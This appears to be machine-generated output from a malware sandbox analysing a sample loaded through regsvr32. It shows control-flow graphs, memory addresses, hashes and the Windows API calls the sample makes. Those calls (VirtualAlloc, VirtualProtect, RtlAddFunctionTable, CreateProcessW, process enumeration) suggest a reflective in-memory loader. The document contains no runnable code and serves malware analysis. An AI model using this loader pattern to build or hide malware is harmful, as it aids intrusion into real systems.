                                                                                                      execution_graph 3185 18000be34 3188 180005db4 3185->3188 3187 18000bf4c 3189 180005df9 3188->3189 3190 1800060dd Process32FirstW 3189->3190 3191 180005e61 3189->3191 3190->3189 3191->3187 3220 1800096b8 3222 1800096f2 3220->3222 3221 18000971e 3222->3221 3224 18000be34 3222->3224 3225 180005db4 Process32FirstW 3224->3225 3226 18000bf4c 3225->3226 3226->3222 3192 18000d1ca 3193 18000d3e6 3192->3193 3195 18000d1d3 3192->3195 3196 180015b18 3193->3196 3199 180015b4c 3196->3199 3198 1800160d6 3198->3195 3199->3198 3200 18000741c 3199->3200 3201 18000745d 3200->3201 3204 1800284b0 3201->3204 3203 1800075fe 3203->3199 3206 180028554 3204->3206 3205 180028653 CreateProcessW 3205->3203 3206->3205 3231 18001d32c 3232 18001d36d 3231->3232 3233 18001d706 3232->3233 3234 18000be34 Process32FirstW 3232->3234 3234->3232 3207 6f0000 3210 6f015a 3207->3210 3208 6f033f GetNativeSystemInfo 3209 6f0377 VirtualAlloc 3208->3209 3211 6f08eb 3208->3211 3215 6f0395 3209->3215 3210->3208 3210->3211 3212 6f0873 3212->3211 3213 6f08c6 RtlAddFunctionTable 3212->3213 3213->3211 3214 6f084b VirtualProtect 3214->3215 3215->3212 3215->3214 3215->3215 3239 18000f3e0 3242 18000f41e 3239->3242 3240 18000741c CreateProcessW 3241 18000fdb1 3240->3241 3242->3240 3242->3241

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 6f0000-6f029a call 6f091c * 2 13 6f0905 0->13 14 6f02a0-6f02a4 0->14 16 6f0907-6f091a 13->16 14->13 15 6f02aa-6f02ae 14->15 15->13 17 6f02b4-6f02b8 15->17 17->13 18 6f02be-6f02c5 17->18 18->13 19 6f02cb-6f02dc 18->19 19->13 20 6f02e2-6f02eb 19->20 20->13 21 6f02f1-6f02fc 20->21 21->13 22 6f0302-6f0312 21->22 23 6f033f-6f0371 GetNativeSystemInfo 22->23 24 6f0314-6f031a 22->24 23->13 25 6f0377-6f0393 VirtualAlloc 23->25 26 6f031c-6f0324 24->26 27 6f03aa-6f03ae 25->27 28 6f0395-6f03a8 25->28 29 6f032c-6f032d 26->29 30 6f0326-6f032a 26->30 32 6f03dc-6f03e3 27->32 33 6f03b0-6f03c2 27->33 28->27 31 6f032f-6f033d 29->31 30->31 31->23 31->26 36 6f03fb-6f0417 32->36 37 6f03e5-6f03f9 32->37 35 6f03d4-6f03d8 33->35 38 6f03da 35->38 39 6f03c4-6f03d1 35->39 40 6f0419-6f041a 36->40 41 6f0458-6f0465 36->41 37->36 37->37 38->36 39->35 42 6f041c-6f0422 40->42 43 6f046b-6f0472 41->43 44 6f0537-6f0542 41->44 45 6f0448-6f0456 42->45 46 6f0424-6f0446 42->46 43->44 49 6f0478-6f0485 43->49 47 6f0548-6f0559 44->47 48 6f06e6-6f06ed 44->48 45->41 45->42 46->45 46->46 50 6f0562-6f0565 47->50 52 6f07ac-6f07c3 48->52 53 6f06f3-6f0707 48->53 49->44 51 6f048b-6f048f 49->51 54 6f055b-6f055f 50->54 55 6f0567-6f0574 50->55 56 6f051b-6f0525 51->56 59 6f087a-6f088d 52->59 60 6f07c9-6f07cd 52->60 57 6f070d 53->57 58 6f07a9-6f07aa 53->58 54->50 63 6f060d-6f0619 55->63 64 6f057a-6f057d 55->64 61 6f052b-6f0531 56->61 62 6f0494-6f04a8 56->62 65 6f0712-6f0736 57->65 58->52 81 6f088f-6f089a 59->81 82 6f08b3-6f08ba 59->82 66 6f07d0-6f07d3 60->66 61->44 61->51 67 6f04cf-6f04d3 62->67 68 6f04aa-6f04cd 62->68 73 6f061f 63->73 74 6f06e2-6f06e3 63->74 64->63 69 6f0583-6f059b 64->69 94 6f0738-6f073e 65->94 95 6f0796-6f079f 65->95 71 6f085f-6f086d 66->71 72 6f07d9-6f07e9 66->72 77 6f04d5-6f04e1 67->77 78 6f04e3-6f04e7 67->78 76 6f0518-6f0519 68->76 69->63 79 6f059d-6f059e 69->79 71->66 75 6f0873-6f0874 71->75 83 6f080d-6f080f 72->83 84 6f07eb-6f07ed 72->84 85 6f0625-6f0648 73->85 74->48 75->59 76->56 90 6f0511-6f0515 77->90 92 6f04fe-6f0502 78->92 93 6f04e9-6f04fc 78->93 91 6f05a0-6f0605 79->91 96 6f08ab-6f08b1 81->96 86 6f08bc-6f08c4 82->86 87 6f08eb-6f0903 82->87 88 6f0822-6f082b 83->88 89 6f0811-6f0820 83->89 97 6f07ef-6f07f9 84->97 98 6f07fb-6f080b 84->98 108 6f064a-6f064b 85->108 109 6f06b2-6f06b7 85->109 86->87 101 6f08c6-6f08e9 RtlAddFunctionTable 86->101 87->16 104 6f082e-6f083d 88->104 89->104 90->76 91->91 105 6f0607 91->105 92->76 103 6f0504-6f050e 92->103 93->90 106 6f0748-6f0754 94->106 107 6f0740-6f0746 94->107 95->65 102 6f07a5-6f07a6 95->102 96->82 99 6f089c-6f08a8 96->99 97->104 98->104 99->96 101->87 102->58 103->90 110 6f083f-6f0845 104->110 111 6f084b-6f085c VirtualProtect 104->111 105->63 114 6f0756-6f0757 106->114 115 6f0764-6f0776 106->115 113 6f077b-6f078d 107->113 117 6f064e-6f0651 108->117 118 6f06ce-6f06d8 109->118 119 6f06b9-6f06bd 109->119 110->111 111->71 113->95 127 6f078f-6f0794 113->127 116 6f0759-6f0762 114->116 115->113 116->115 116->116 122 6f065b-6f0666 117->122 123 6f0653-6f0659 117->123 118->85 125 6f06de-6f06df 118->125 119->118 121 6f06bf-6f06c3 119->121 121->118 130 6f06c5 121->130 128 6f0668-6f0669 122->128 129 6f0676-6f0688 122->129 126 6f068d-6f06a3 123->126 125->74 133 6f06ac 126->133 134 6f06a5-6f06aa 126->134 127->94 131 6f066b-6f0674 128->131 129->126 130->118 131->129 131->131 133->109 134->117
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE ref: 006F0344
                                                                                                      • VirtualAlloc.KERNELBASE ref: 006F038A
                                                                                                      • VirtualProtect.KERNELBASE ref: 006F085C
                                                                                                      • RtlAddFunctionTable.KERNEL32 ref: 006F08E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.463620581.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_6f0000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 998211078-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: 6d1456dde12950fa9a4bb06a34560926c1ffc320791aa4127ee1618f57e81d36
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: 39520530618B4C8BDB19DF18D8857BAB7E2FB54304F14462DE98BC7252DB34E946CB86
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 399 1800284b0-18002857e call 180011408 402 180028653-18002868d CreateProcessW 399->402 403 180028584-18002864d call 18000f174 399->403 403->402
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.464095447.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_180001000_regsvr32.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                      • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%